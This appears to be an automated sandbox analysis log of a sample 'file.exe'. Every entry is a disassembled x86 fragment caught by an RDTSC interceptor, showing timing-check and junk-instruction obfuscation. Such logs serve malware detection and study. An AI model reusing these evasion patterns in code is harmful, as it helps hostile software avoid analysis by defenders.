                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70246 second address: B702FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007EFD6CDBF8BAh 0x00000010 nop 0x00000011 add ch, FFFFFF8Bh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007EFD6CDBF898h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov dx, bx 0x00000033 push 31E87FEAh 0x00000038 jmp 00007EFD6CDBF89Ch 0x0000003d xor dword ptr [esp], 31E87F6Ah 0x00000044 sub dword ptr [ebp+122D1B44h], esi 0x0000004a push 00000003h 0x0000004c jp 00007EFD6CDBF8A0h 0x00000052 pushad 0x00000053 mov esi, eax 0x00000055 xor eax, dword ptr [ebp+122D2C85h] 0x0000005b popad 0x0000005c push 00000000h 0x0000005e add esi, dword ptr [ebp+122D3B65h] 0x00000064 push 00000003h 0x00000066 mov esi, dword ptr [ebp+122D2BC9h] 0x0000006c call 00007EFD6CDBF899h 0x00000071 push ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B702FA second address: B702FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B702FE second address: B70302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70302 second address: B70314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007EFD6CF3F376h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70314 second address: B7031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7031A second address: B7031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7031F second address: B70357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jne 00007EFD6CDBF8B0h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edx 0x00000016 jnp 00007EFD6CDBF89Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70357 second address: B70364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70364 second address: B7036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7036F second address: B70373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70373 second address: B703B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D324Fh], ebx 0x0000000e lea ebx, dword ptr [ebp+12455EEDh] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007EFD6CDBF898h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B703B5 second address: B703BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B703BB second address: B703CD instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD6CDBF896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70481 second address: B704A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70572 second address: B705FC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD6CDBF898h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ecx 0x0000000f jmp 00007EFD6CDBF89Eh 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 push ecx 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop ecx 0x0000001c pushad 0x0000001d jne 00007EFD6CDBF896h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b jmp 00007EFD6CDBF8A4h 0x00000030 pop eax 0x00000031 jmp 00007EFD6CDBF8A7h 0x00000036 lea ebx, dword ptr [ebp+12455EF8h] 0x0000003c sub ecx, 4FC64DB0h 0x00000042 and cx, 5000h 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007EFD6CDBF8A4h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91819 second address: B91823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91823 second address: B91865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFD6CDBF8A1h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop eax 0x00000013 push ecx 0x00000014 jmp 00007EFD6CDBF89Fh 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007EFD6CDBF89Ch 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91865 second address: B9186B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61893 second address: B61899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61899 second address: B6189F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6189F second address: B618A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F6C8 second address: B8F6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F6CE second address: B8F6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFD6CDBF896h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F81F second address: B8F823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F823 second address: B8F85F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007EFD6CDBF896h 0x00000009 jmp 00007EFD6CDBF8A9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFD6CDBF89Fh 0x00000018 push edi 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F85F second address: B8F86B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFD6CF3F376h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F86B second address: B8F86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FB68 second address: B8FB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FE60 second address: B8FE66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FE66 second address: B8FE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FFBE second address: B8FFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FFC2 second address: B8FFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007EFD6CF3F37Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B902B3 second address: B902BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007EFD6CDBF896h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B906A7 second address: B906B1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD6CF3F376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B906B1 second address: B906F8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFD6CDBF8B5h 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007EFD6CDBF896h 0x00000010 jmp 00007EFD6CDBF8A8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87AEB second address: B87AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87AEF second address: B87B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007EFD6CDBF8A8h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 jg 00007EFD6CDBF896h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90992 second address: B9099C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD6CF3F38Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9099C second address: B909B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A2h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B909B6 second address: B909BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B909BA second address: B909C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90F79 second address: B90F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90F7E second address: B90F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B910C5 second address: B910C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B910C9 second address: B910CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B910CF second address: B910D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91251 second address: B91255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91255 second address: B9125B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9125B second address: B9127D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD6CDBF8A7h 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B913C2 second address: B913D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007EFD6CF3F37Dh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B913D4 second address: B913DE instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD6CDBF8A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B913DE second address: B913E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97BFE second address: B97C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96331 second address: B96335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96335 second address: B96343 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD6CDBF896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96343 second address: B96347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BE2D second address: B9BE37 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFD6CDBF896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BE37 second address: B9BE41 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD6CF3F37Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4AB second address: B9C4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4C0 second address: B9C4C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4C8 second address: B9C4D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4D0 second address: B9C4D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4D6 second address: B9C4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C4DF second address: B9C51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CF3F37Ch 0x00000009 js 00007EFD6CF3F376h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jc 00007EFD6CF3F376h 0x0000001a jbe 00007EFD6CF3F376h 0x00000020 popad 0x00000021 jmp 00007EFD6CF3F37Ch 0x00000026 js 00007EFD6CF3F382h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C51B second address: B9C521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D5F3 second address: B9D5F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D5F8 second address: B9D61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007EFD6CDBF8A9h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DA17 second address: B9DA1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DA1D second address: B9DA23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DD1C second address: B9DD41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD6CF3F37Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E2B6 second address: B9E2BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E38C second address: B9E390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E409 second address: B9E410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E698 second address: B9E69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E69C second address: B9E6D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007EFD6CDBF8A9h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E744 second address: B9E74B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E7D2 second address: B9E802 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007EFD6CDBF896h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub di, ECA9h 0x00000014 xchg eax, ebx 0x00000015 jmp 00007EFD6CDBF8A0h 0x0000001a push eax 0x0000001b push edi 0x0000001c pushad 0x0000001d js 00007EFD6CDBF896h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ECBC second address: B9ECC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ECC2 second address: B9ECC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F78D second address: B9F793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F793 second address: B9F797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA06FD second address: BA0707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1145 second address: BA1149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9D59 second address: BD9D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFB50 second address: BDFB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFD6CF3F376h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD6CF3F385h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFB73 second address: BDFB77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9B6 second address: BDE9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9BE second address: BDE9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9C7 second address: BDE9CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9CB second address: BDE9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9D1 second address: BDE9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9D7 second address: BDE9FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD6CDBF89Dh 0x00000008 jg 00007EFD6CDBF896h 0x0000000e jns 00007EFD6CDBF896h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE9FD second address: BDEA01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE5C6 second address: BDE5DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD6CDBF8A2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE5DC second address: BDE5E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
